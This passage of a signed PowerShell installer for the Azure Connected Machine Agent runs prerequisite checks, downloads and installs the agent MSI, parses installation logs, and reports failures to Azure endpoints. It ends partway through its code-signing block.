Stack HCI') { return $true } return $false } function Test-PowerShellVersion() { [CmdletBinding()] param ( ) Write-Verbose -Message "PowerShell version: $($PSVersionTable.PSVersion)" -Verbose return ($PSVersionTable.PSVersion -ge [Version]"3.0") } function Test-DotNetFramework() { [CmdletBinding()] param ( ) try { $installedVersion = [version] (Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' -Name Version | select -ExpandProperty Version) } catch { Write-Verbose -Message "Error $_ Unable to determine .NET Framework version" -Verbose # Will attempt to install anyway return $true } Write-Verbose -Message ".NET Framework version: $installedVersion" -Verbose if ($installedVersion -ge $refVersion) { return $true } return $false } function Test-IsAzure() { [CmdletBinding()] param ( ) Write-Verbose -Message "Checking if this is an Azure virtual machine" -Verbose try { if ($PSVersionTable.PSVersion -ge [Version]"6.0") { $response = Invoke-WebRequest -UseBasicParsing -Uri "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01" -Headers @{Metadata = "true"} -NoProxy -TimeoutSec 1 -ErrorAction SilentlyContinue } else { $response = Invoke-WebRequest -UseBasicParsing -Uri "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01" -Headers @{Metadata = "true"} -TimeoutSec 1 -ErrorAction SilentlyContinue } if ($null -ne $response -and $response.StatusCode -eq 200) { $content = ConvertFrom-Json $($response.Content.ToString()) if ($null -ne $content.resourceId) { Write-Verbose -Message "Azure check indicates that we are in Azure" -Verbose return $true } } } catch { Write-Verbose -Message "Error $_ checking if we are in Azure" -Verbose return $false } return $false } function Get-MsiLogSummary() { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string]$LogPath ) try { $LogPath = Resolve-Path $LogPath Write-Verbose -Message "Reading Logs from $LogPath" -Verbose $patterns = @( "Installation success or error status", "Product: Azure Connected Machine Agent" ); $regex = "(" + ($patterns -join ")|(" ) + ")" Write-Verbose -Message "Looking for Patterns: $regex" -Verbose $inCustomAction = $false $logCustomAction = $false $caOutput = new-object -TypeName System.Collections.ArrayList Get-Content $LogPath | % { # log interesting lines if ( ($_ -match $regex)) { $_ # output to pipeline } # Wix custom actions start with "Calling custom Action". Gather the log from the CA till we see if it passed # At the end, log that output only if it failed with "returned actual error" if ($_ -match "Calling custom action") { $inCustomAction = $true $logCustomAction = $false } if ($_ -match "MSI \(s\)") { $inCustomAction = $false } if ($_ -match "returned actual error") { $logCustomAction = $true } if ($inCustomAction) { $null = $caOutput.Add($_) } else { if($logCustomAction) { $caOutput # output saved lines to pipeline } $caOutput.Clear() } } } catch { # This code is optional so if something goes wrong we'll just swallow the error and have no details Write-Verbose -Message "Error while parsing MSI log: $_" -Verbose } } function Send-Failure { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [System.Exception] $Error, [Parameter(Mandatory = $true)] [string] $ErrorCode, [Parameter(Mandatory = $false)] [string] $AltHisEndpoint ) $hisEndpoint = "https://gbl.his.arc.azure.com" if ($env:CLOUD -eq "AzureUSGovernment") { $hisEndpoint = "https://gbl.his.arc.azure.us" } elseif ($env:CLOUD -eq "AzureChinaCloud") { $hisEndpoint = "https://gbl.his.arc.azure.cn" } elseif ($env:CLOUD -eq "AzureStackCloud") { if ($AltHisEndpoint) { $hisEndpoint = $AltHisEndpoint } else { Write-Warning "error in Send-Failure due to invalid his endpoint." return } } $message = "$Error" if ($Error.Data["Details"]) { $message = $Error.Data["Details"] } $message = $message.Substring(0, [Math]::Min($message.Length, 500)) if ( $env:PROVIDER_NAMESPACE ) { $provider = $env:PROVIDER_NAMESPACE } $logBody = @{subscriptionId="$env:SUBSCRIPTION_ID";resourceGroup="$env:RESOURCE_GROUP";tenantId="$env:TENANT_ID";location="$env:LOCATION";correlationId="$env:CORRELATION_ID";authType="$env:AUTH_TYPE";operation="onboarding";namespace="$provider";osType="windows";messageType="$ErrorCode";message="$message";} try { Invoke-WebRequest -UseBasicParsing -Uri "$hisEndpoint/log" -Method "PUT" -Body ($logBody | ConvertTo-Json) -ErrorAction SilentlyContinue } catch {} } # Based on the MSI error code, we may have some hint to provide as to the issue # See https://learn.microsoft.com/en-us/windows/win32/msi/error-codes function Get-MsiErrorDetails() { [CmdletBinding()] param( $exitCode ) $message = (net helpmsg $exitCode) -join "" $hint = "" $errorCode = "AZCM0149" # exitCode is the return value from msiexec. errorCode is the error code of the script switch($exitCode) { 1603 { # ERROR_INSTALL_FAILURE $hint = "A fatal error occurred during installation" $errorCode = "AZCM0156" } 1633 { # ERROR_INSTALL_PLATFORM_UNSUPPORTED $hint = "Unsupported: Azure Connected Machine Agent is only compatible with X64 operating systems" $errorCode = "AZCM0153" } } return [PSCustomObject]@{ Message = $message Hint = $hint ErrorCode = $errorCode } } function CheckRSOPLogonRights { # Checks RSOP to see if a group policy may prevent himds from running # Support PS 1-2 for initial requirements check even though PS4 is required for product if ($PSVersionTable.PSVersion.Major -ge 3) { $securitySettings = Get-CimInstance -Namespace "root/RSOP/Computer" -ClassName "RSOP_SecuritySettings" -ErrorAction SilentlyContinue -ErrorVariable "rsoperror" } else { $securitySettings = Get-WmiObject -Namespace "root/RSOP/Computer" -Class "RSOP_SecuritySettings" -ErrorAction SilentlyContinue -ErrorVariable "rsoperror" } if ($rsoperror -ne $null) { Write-Warning "Unable to retrieve RSOP data to check local security policy." return } # Find the RSOP results for SeLogonAsAService, might be empty $logonAsServicePolicy = $securitySettings | Where-Object { $_.UserRight -eq "SeServiceLogonRight" } $logonAsServicePrincipals = $logonAsServicePolicy | Select-Object -ExpandProperty AccountList # If the list is empty, contains NT SERVICE\ALL SERVICES (default), or contains NT SERVICE\himds then our service can run if ($logonAsServicePrincipals -and ` $logonAsServicePrincipals -notcontains "NT SERVICE\ALL SERVICES" -and ` $logonAsServicePrincipals -notcontains "NT SERVICE\himds" -and ` $logonAsServicePrincipals -notcontains "S-1-5-80-4215458991-2034252225-2287069555-1155419622-2701885083") { Write-Warning "The local security policy on this system will prevent the agent from loading. Contact your Group Policy administrator to ensure 'NT SERVICE\ALL SERVICES' is included in any Group Policy Objects that configure the Logon as a Service User Rights Assignment. See https://aka.ms/ArcServerURA for more information." Write-Warning "GPO ID: $($logonAsServicePolicy.GPOID)" } } function Check-Physical-Memory() { [CmdletBinding()] param ( ) $memory = systeminfo | Select-String '^Total Physical Memory' Write-Verbose -Message "$memory" -Verbose } function Download-With-Retries() { [CmdletBinding()] param ( [Parameter(Mandatory=$true)][string]$downloadUri, [Parameter(Mandatory=$false)][int]$maxAttempts = 3 ) $attempts=1 do { try { if (([Uri]$downloadUri).Scheme -in @("https","http")) { Write-Verbose -Message "Downloading agent package from $downloadUri to $msiFile" -Verbose # It's a web site, download it if ($Proxy) { Invoke-WebRequest -UseBasicParsing -Proxy $Proxy -Uri $downloadUri -OutFile $msiFile } else { Invoke-WebRequest -UseBasicParsing -Uri $downloadUri -OutFile $msiFile } } else { # This could be a UNC path or a local file, just try and copy it Write-Verbose -Message "Copying agent package from $downloadUri to $msiFile" -Verbose Copy-Item $downloadUri $msiFile } return } catch { $attempts++ Write-Verbose -Message "Download failure: $_ ..Retrying..." -Verbose } } while ($attempts -le $maxAttempts) Invoke-Failure -ErrorCode "AZCM0148" -Message "Download of $downloadUri failed: $_" } try { #Check if PowerShell is running as administrator if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Invoke-Failure -Message "This script must be run as an administrator." -ErrorCode "AZCM0155" } # Ensure TLS 1.2 is accepted. Older PowerShell builds (sometimes) complain about the enum "Tls12" so we use the underlying value [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor 3072 # Ensure TLS 1.3 is accepted, if this .NET supports it (older versions don't) try { [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor 12288 } catch {} Write-Verbose -Message "Installing Azure Connected Machine Agent" -Verbose Check-Physical-Memory $hci = Test-AzureStackHCI if ($hci) { Invoke-Failure -Message "This server is running Azure Stack HCI and should be connected to Azure Arc using the built-in registration experience: https://aka.ms/install-arc-on-hci-host" -ErrorCode "AZCM0152" } $validPowerShell = Test-PowerShellVersion if (-Not $validPowerShell) { Invoke-Failure -Message "Azure Connected Machine Agent requires PowerShell version 4.0 or later" -ErrorCode "AZCM0154" } $validFramework = Test-DotNetFramework if (-Not $validFramework) { Invoke-Failure -Message "Azure Connected Machine Agent requires .NET Framework version $refVersion or later" -ErrorCode "AZCM0151" } $inAzure = Test-IsAzure if ($inAzure) { $override = [System.Environment]::GetEnvironmentVariable("MSFT_ARC_TEST", [System.EnvironmentVariableTarget]::Machine) if ('true' -eq $override) { Write-Warning '''Running on an Azure Virtual Machine with MSFT_ARC_TEST set. Azure Connected Machine Agent is designed for use outside Azure. This virtual machine should only be used for testing purposes. See https://aka.ms/azcmagent-testwarning for more details. ''' } else { Invoke-Failure -ErrorCode "AZCM0147" -Message '''Cannot install Azure Connected Machine agent on an Azure Virtual Machine. Azure Connected Machine Agent is designed for use outside Azure. To connect an Azure VM for TESTING PURPOSES ONLY, see https://aka.ms/azcmagent-testwarning for more details. ''' } } CheckRSOPLogonRights # Download the package $msiFile = Join-Path "$env:Temp" "AzureConnectedMachineAgent.msi" if ($AltDownload) { $downloadUri = $AltDownload } else { $downloadUri = "https://aka.ms/AzureConnectedMachineAgent" } Download-With-Retries -downloadUri $downloadUri # Install the package $logFile = Join-Path -Path "$env:Temp" -ChildPath "installationlog.txt" $argList = @("/i", "$msiFile" , "/l*v", "$logFile", "/qn", "REBOOT=ReallySuppress") Write-Verbose -Message "Installing agent package" -Verbose $exitCode = (Start-Process -FilePath msiexec.exe -ArgumentList $argList -Wait -Passthru).ExitCode if ($exitCode -ne 0) { # Treat ERROR_SUCCESS_REBOOT_INITIATED (1641) and ERROR_SUCCESS_REBOOT_REQUIRED (3010) as success if ($exitCode -eq 1641 -Or $exitCode -eq 3010) { Write-Warning -Message "Installation succeeded but a reboot is required to complete the installation." Write-Verbose -Message "Msiexec returned: $exitCode - treating it as success" -Verbose } else { $details = (Get-MsiErrorDetails $exitCode) $logInfo = ((Get-MsiLogSummary "$logFile") -join "`n") Invoke-Failure -Message "Installation failed: [$exitCode]: $($details.Message) $($details.Hint)`: See $logFile for additional details." -ErrorCode $details.ErrorCode -Details $logInfo } } # Check if we need to set proxy environment variable if ($PSBoundParameters.ContainsKey("Proxy")) { if ($Proxy) { Write-Verbose -Message "Setting proxy configuration: $Proxy" -Verbose & "$env:ProgramW6432\AzureConnectedMachineAgent\azcmagent" config set proxy.url ${Proxy} } else { Write-Verbose -Message "Clearing proxy configuration" -Verbose & "$env:ProgramW6432\AzureConnectedMachineAgent\azcmagent" config clear proxy.url } } } catch { $code = $_.Exception.Data.ErrorCode $details = $_.Exception.Data.Details if(!$code) { $code = "AZCM0150" } # default if we do not have some more specific error if ($OutFile) { [ordered]@{ status = "failed" error = [ordered]@{ message = $_.Exception.Message code = $code details = $details } } | ConvertTo-Json | Out-File $OutFile } Write-Error $_ -ErrorAction Continue if ($details) { Write-Output "Details: $details" } Send-Failure $_.Exception $code $AltHisEndpoint exit 1 } # Installation was successful if we got this far if ($OutFile) { [ordered]@{ status = "success" message = "Installation of azcmagent completed successfully" } | ConvertTo-Json | Out-File $OutFile } Write-Host "Installation of azcmagent completed successfully" exit 0 # SIG # Begin signature block # MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAbMjtLnmbgtDU1 # 2jbGnyzwGflyglQA9LRbYmN9HySThKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIKQWCNC/Wzk2/izApFdNpown # tTQLI9NROxcBRjrKNB4ZMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAZPwDgq47uuajkdt/J1ZresIlioaNcEYybg3TcVbDU8dWiTH5cvr6/WI5 # JPqe93X07dOttF0HfZBiwye35KbY6DX5m4PhQAQ3EsJypq1UBQkexOfhwFTfPEIM # AUtTWzJqCPDaoA4q2pIGW0hIFSWtunPsYW8DiulHDEOl7mYyr15PTfZjdsxtNNnd # ohzwnE9cwXS7ucrDki/0MUqqZ7sg+LSagXILVV/EYlcYCaloTpDL3d0phrE4qXng # JjALK+6QCbcz7i50zUkyrOVmZI4isHkkVu65FQAXd16VlBFLQbVyNLs/Ahoay18W # NKroOQr99+AIJnWiX6QLdvJk4ybKZaGCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC # FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAly0SZyQEd2R6FeOeVGx/x3iRgiZDqY3FFcUw7eGZnYwIGZfyfA09N # GBMyMDI0MDQxNzE0NDMyMi40OTJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC # RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis # DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI # ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z # ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR # IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE # lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s # /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4 # aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB # fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT # me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy # qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui # hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds # lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf # sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t # Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU # +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7 # qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6 # Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+ # x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4 # 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5 # ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV # PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4 # y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk # 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 